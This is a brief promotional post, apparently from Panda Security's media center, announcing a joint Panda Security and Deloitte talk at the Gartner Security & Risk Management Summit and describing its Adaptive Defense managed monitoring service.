At the heart of this agreement is Adaptive Defense, a managed cybersecurity service based on continuous monitoring of all active processes, with automatic classification via artificial intelligence and behaviour analysis by Security Operation Center experts. This ecosystem allows organizations to become more resilient and significantly reduces the probability of experiencing a damaging breach.

Further details on the joint Panda Security and Deloitte talk are available on the summit site, where you can also add the Gartner Security & Risk Management Summit to your calendar.

The post Panda Security and Deloitte Have Exciting Announcement for the Gartner Summit appeared first on Panda Security Mediacenter.
